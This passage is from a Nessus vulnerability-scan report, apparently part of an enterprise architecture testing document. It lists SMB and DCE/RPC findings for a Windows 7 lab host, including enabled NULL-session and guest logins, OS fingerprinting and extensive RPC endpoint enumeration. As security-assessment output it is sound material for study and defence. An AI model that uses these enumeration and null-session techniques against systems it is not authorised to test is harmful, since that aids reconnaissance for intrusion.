Type : Remote RPC service
Named pipe : \pipe\eventlog
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0
Description : Unknown RPC service
Annotation : DHCPv6 Client LRPC Endpoint
Type : Remote RPC service
Named pipe : \pipe\eventlog
Netbios name : \\WIN7
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
Description : Unknown RPC serviceAnnotation : Security Center
Type : Remote RPC service
Named pipe : \pipe\eventlog
Netbios name : \\WIN7
Nessus ID : 10736
SMB NativeLanMan
Synopsis :
It is possible to obtain information about the remote operating
system.
Description :
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 38/73
PAGE | 38
It is possible to get the remote operating system name and
version (Windows and/or Samba) by sending an authentication
request to port 139 or 445.
Solution :
n/a
Risk factor :
None
Plugin output :
The remote Operating System is : Windows 7 Professional 7600
The remote native lan manager is : Windows 7 Professional 6.1
The remote SMB Domain Name is : WIN7
Nessus ID : 10785
SMB log in
Synopsis :
It is possible to log into the remote host.
Description :
The remote host is running one of the Microsoft Windows operating
systems. It was possible to log into it using one of the following
account :
- NULL session
- Guest account
- Given Credentials
See also :
http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP
http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP
Solution :
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 39/73
PAGE | 39
n/a
Risk factor :
None
Plugin output :
- NULL sessions are enabled on the remote host
CVE : CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2002-1117, CVE-2005-3595
BID : 494, 990, 11199
Nessus ID : 10394
SMB LanMan Pipe Server browse listing
Synopsis :
It is possible to obtain network information.
Description :
It was possible to obtain the browse list of the remote Windows system
by send a request to the LANMAN pipe. The browse list is the list of
the nearest Windows systems of the remote host.
Solution :
n/a
Risk factor :
None
Plugin output :
Here is the browse list of the remote host :
WIN7 ( os : 6.1 )
Other references : OSVDB:300
Nessus ID : 10397
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 40/73
PAGE | 40
SMB NULL session
Synopsis :
It is possible to log into the remote Windows host with a NULLsession.
Description :
The remote host is running Microsoft Windows, and it was possible to
log into it using a NULL session (ie, with no login or password). An
unauthenticated remote attacker can leverage this issue to get
information about the remote host.
See also :
http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP
http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP
Solution :
n/a
Risk factor :
None
CVE : CVE-2002-1117BID : 494
Nessus ID : 26920
SMB registry can not be accessed by the scanner
Synopsis :
Nessus is not able to access the remote Windows Registry.
Description :
It was not possible to connect to PIPE\winreg on the remote host.
If you intend to use Nessus to perform registry-based checks, the registry checks will not work because the 'Remote
Registry Access' service (winreg) has been disabled on the remote host or can not be connected to with the supplied
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 41/73
PAGE | 41
credentials.
Solution :
n/a
Risk factor : None
Nessus ID : 26917
Port epmap (135/tcp)
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapper
PIPE) it was possible to enumerate the Distributed Computing Environment
(DCE) services running on the remote port.
Using this information it is possible to connect and bind to
each service by sending an RPC request to the remote port/pipe.
Solution :
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available locally :
Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91
UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : WindowsShutdown
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 42/73
PAGE | 42
Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91
UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : WMsgKRpc0436C0
Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000
UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : WindowsShutdown
Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000
UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : WMsgKRpc0436C0
Object UUID : 6d726574-7273-0076-0000-000000000000
UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0
Description : Unknown RPC service
Annotation : Impl friendly name
Type : Local RPC service
Named pipe : LRPC-c6a2c9660bb6328c4f
Object UUID : 52ef130c-08fd-4388-86b3-6edf00000001
UUID : 12e65dd8-887f-41ef-91bf-8d816c42c2e7, version 1.0
Description : Unknown RPC service
Annotation : Secure Desktop LRPC interfaceType : Local RPC service
Named pipe : WMsgKRpc043881
Object UUID : b08669ee-8cb5-43a5-a017-84fe00000001
UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : WMsgKRpc043881
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0Description : IPsec Services (Windows XP & 2003)
Windows process : lsass.exe
Annotation : IPSec Policy agent endpoint
Type : Local RPC service
Named pipe : LRPC-ca5f5144be75bc564b
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 43/73
PAGE | 43
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0
Description : Unknown RPC service
Annotation : Remote Fw APIs
Type : Local RPC service
Named pipe : LRPC-ca5f5144be75bc564b
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b58aa02e-2884-4e97-8176-4ee06d794184, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : OLE25D40AF7017C4837B051B3DE1DA2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b58aa02e-2884-4e97-8176-4ee06d794184, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : trkwks
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 8174bb16-571b-4c38-8386-1102b449044a, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : LRPC-92b6673cbb004993d5
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a2d47257-12f7-4beb-8981-0ebfa935c407, version 1.0
Description : Unknown RPC service
Type : Local RPC serviceNamed pipe : LRPC-92b6673cbb004993d5
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3f31c91e-2545-4b7b-9311-9529e8bffef6, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : LRPC-92b6673cbb004993d5
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 4b112204-0e19-11d3-b42b-0000f81feb9f, version 1.0
Description : SSDP serviceWindows process : unknow
Type : Local RPC service
Named pipe : LRPC-4348df7c4ffce47473
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : dd490425-5325-4565-b774-7e27d6c09c24, version 1.0
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 44/73
PAGE | 44
Description : Unknown RPC service
Annotation : Base Firewall Engine API
Type : Local RPC service
Named pipe : LRPC-5448665e392adc7390
Object UUID : 00000000-0000-0000-0000-000000000000UUID : 7f9d11bf-7fb9-436b-a812-b2d50c5d4c03, version 1.0
Description : Unknown RPC service
Annotation : Fw APIs
Type : Local RPC service
Named pipe : LRPC-5448665e392adc7390
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 2fb92682-6599-42dc-ae13-bd2ca89bd11c, version 1.0
Description : Unknown RPC service
Annotation : Fw APIs
Type : Local RPC service
Named pipe : LRPC-5448665e392adc7390
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1, version 1.0
Description : Unknown RPC service
Annotation : Spooler function endpoint
Type : Local RPC service
Named pipe : spoolss
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : ae33069b-a2a8-46ee-a235-ddfd339be281, version 1.0
Description : Unknown RPC serviceAnnotation : Spooler base remote object endpoint
Type : Local RPC service
Named pipe : spoolss
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 4a452661-8290-4b36-8fbe-7f4093a94978, version 1.0
Description : Unknown RPC service
Annotation : Spooler function endpoint
Type : Local RPC service
Named pipe : spoolss
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Local RPC service
Named pipe : LRPC-04dfdd309d86a33c86
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 45/73
PAGE | 45
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Local RPC serviceNamed pipe : audit
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Local RPC service
Named pipe : securityevent
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Local RPC service
Named pipe : LSARPC_ENDPOINT
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Local RPC service
Named pipe : lsapolicylookup
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exe
Type : Local RPC service
Named pipe : lsasspirpc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
Windows process : lsass.exeType : Local RPC service
Named pipe : protected_storage
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0
Description : Security Account Manager
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 46/73
PAGE | 46
Windows process : lsass.exe
Type : Local RPC service
Named pipe : samss lpc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0Description : Unknown RPC service
Annotation : KeyIso
Type : Local RPC service
Named pipe : LRPC-04dfdd309d86a33c86
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Local RPC service
Named pipe : audit
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Local RPC service
Named pipe : securityevent
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIsoType : Local RPC service
Named pipe : LSARPC_ENDPOINT
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Local RPC service
Named pipe : lsapolicylookup
Object UUID : 00000000-0000-0000-0000-000000000000UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Local RPC service
Named pipe : lsasspirpc
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 47/73
PAGE | 47
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Local RPC service
Named pipe : protected_storage
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0
Description : Unknown RPC service
Annotation : KeyIso
Type : Local RPC service
Named pipe : samss lpc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0
Description : Unknown RPC service
Annotation : NSI server endpoint
Type : Local RPC service
Named pipe : OLEDFFAAD5DBE1B4928A1CFE1851294
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0
Description : Unknown RPC service
Annotation : NSI server endpoint
Type : Local RPC service
Named pipe : LRPC-a1978a56cbce044c9e
Object UUID : 00000000-0000-0000-0000-000000000000UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0
Description : Unknown RPC service
Annotation : WinHttp Auto-Proxy Service
Type : Local RPC service
Named pipe : OLEDFFAAD5DBE1B4928A1CFE1851294
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0
Description : Unknown RPC service
Annotation : WinHttp Auto-Proxy Service
Type : Local RPC serviceNamed pipe : LRPC-a1978a56cbce044c9e
Object UUID : 666f7270-6c69-7365-0000-000000000000
UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0
Description : Unknown RPC service
Annotation : Impl friendly name
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 48/73
PAGE | 48
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 6c637067-6569-746e-0000-000000000000
UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0
Description : Unknown RPC serviceAnnotation : Impl friendly name
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601
UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601
UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 736e6573-0000-0000-0000-000000000000
UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0
Description : Unknown RPC service
Annotation : Impl friendly name
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 736e6573-0000-0000-0000-000000000000
UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0
Description : Unknown RPC service
Annotation : Impl friendly name
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 736e6573-0000-0000-0000-000000000000
UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0
Description : Unknown RPC service
Annotation : Impl friendly nameType : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0
Description : Scheduler Service
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 49/73
PAGE | 49
Windows process : svchost.exe
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0
Description : Scheduler Service
Windows process : svchost.exeType : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : IUserProfile2
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 50/73
PAGE | 50
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0
Description : Scheduler Service
Windows process : svchost.exe
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0
Description : Unknown RPC service
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0
Description : Unknown RPC serviceType : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0
Description : Unknown RPC service
Annotation : IP Transition Configuration endpoint
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0
Description : Unknown RPC service
Annotation : IP Transition Configuration endpoint
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 51/73
PAGE | 51
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0
Description : Unknown RPC service
Annotation : IP Transition Configuration endpoint
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0
Description : Unknown RPC service
Annotation : XactSrv service
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0
Description : Unknown RPC service
Annotation : XactSrv service
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0
Description : Unknown RPC service
Annotation : XactSrv service
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC serviceNamed pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 52/73
PAGE | 52
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0
Description : Unknown RPC serviceAnnotation : AppInfo
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC serviceNamed pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 53/73
PAGE | 53
UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0
Description : Unknown RPC service
Annotation : AppInfo
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0
Description : Unknown RPC service
Annotation : IKE/Authip API
Type : Local RPC service
Named pipe : IUserProfile2
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0Description : Unknown RPC service
Annotation : IKE/Authip API
Type : Local RPC service
Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0
Description : Unknown RPC service
Annotation : IKE/Authip API
Type : Local RPC service
Named pipe : senssvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0
Description : Unknown RPC service
Annotation : Event log TCPIP
Type : Local RPC service
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 54/73
PAGE | 54
Named pipe : eventlog
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0
Description : Unknown RPC service
Annotation : NRP server endpoint Type : Local RPC service
Named pipe : eventlog
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0
Description : Unknown RPC service
Annotation : NRP server endpoint
Type : Local RPC service
Named pipe : AudioClientRpc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0
Description : Unknown RPC service
Annotation : NRP server endpoint
Type : Local RPC service
Named pipe : Audiosrv
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0
Description : DHCP Client Service
Windows process : svchost.exe
Annotation : DHCP Client LRPC Endpoint
Type : Local RPC serviceNamed pipe : eventlog
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0
Description : DHCP Client Service
Windows process : svchost.exe
Annotation : DHCP Client LRPC Endpoint
Type : Local RPC service
Named pipe : AudioClientRpc
Object UUID : 00000000-0000-0000-0000-000000000000UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0
Description : DHCP Client Service
Windows process : svchost.exe
Annotation : DHCP Client LRPC Endpoint
Type : Local RPC service
Named pipe : Audiosrv
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 55/73
PAGE | 55
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0
Description : DHCP Client Service
Windows process : svchost.exe
Annotation : DHCP Client LRPC Endpoint Type : Local RPC service
Named pipe : dhcpcsvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0
Description : Unknown RPC service
Annotation : DHCPv6 Client LRPC Endpoint
Type : Local RPC service
Named pipe : eventlog
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0
Description : Unknown RPC service
Annotation : DHCPv6 Client LRPC Endpoint
Type : Local RPC service
Named pipe : AudioClientRpc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0
Description : Unknown RPC service
Annotation : DHCPv6 Client LRPC Endpoint
Type : Local RPC service
Named pipe : Audiosrv
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0
Description : Unknown RPC service
Annotation : DHCPv6 Client LRPC Endpoint
Type : Local RPC service
Named pipe : dhcpcsvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0
Description : Unknown RPC serviceAnnotation : DHCPv6 Client LRPC Endpoint
Type : Local RPC service
Named pipe : dhcpcsvc6
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 56/73
PAGE | 56
Description : Unknown RPC service
Annotation : Security Center
Type : Local RPC service
Named pipe : eventlog
Object UUID : 00000000-0000-0000-0000-000000000000UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
Description : Unknown RPC service
Annotation : Security Center
Type : Local RPC service
Named pipe : AudioClientRpc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
Description : Unknown RPC service
Annotation : Security Center
Type : Local RPC service
Named pipe : Audiosrv
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
Description : Unknown RPC service
Annotation : Security Center
Type : Local RPC service
Named pipe : dhcpcsvc
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
Description : Unknown RPC serviceAnnotation : Security Center
Type : Local RPC service
Named pipe : dhcpcsvc6
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0
Description : Unknown RPC service
Annotation : Security Center
Type : Local RPC service
Named pipe : OLEE4C5DBF62E0E4163A84295240E81
Nessus ID : 10736
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 57/73
PAGE | 57
Port rtsp (554/tcp)
Port icslap (2869/tcp)
Port netbios-ssn (139/tcp)
SMB Detection
Synopsis :
A file / print sharing service is listening on the remote host.
Description :
The remote service understands the CIFS (Common Internet File System)
or Server Message Block (SMB) protocol, used to provide shared access
to files, printers, etc between nodes on a network.
Solution :
n/a
Risk factor :
None
Plugin output :
An SMB server is running on this port.
Nessus ID : 11011
7/27/2019 Enterprise Architecture Testing
http://slidepdf.com/reader/full/enterprise-architecture-testing 58/73
PAGE | 58
Port unknown (49299/tcp)
DCE Services Enumeration
Synopsis :
A DCE/RPC service is running on the remote host.
Description :
By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the
Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible t
connect and bind to each service by sending an RPC request to the remote port/pipe.
Solution :
N/A
Risk factor :
None
Plugin output :
The following DCERPC services are available on TCP port 49299 :
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0
Description : IPsec Services (Windows XP & 2003)Windows process : lsass.exe
Annotation : IPSec Policy agent endpoint
Type : Remote RPC service
TCP Port : 49299
IP : 192.168.0.171
Object UUID : 00000000-0000-0000-0000-000000000000
UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0
Description : Unknown RPC service
Annotation : Remote Fw APIs
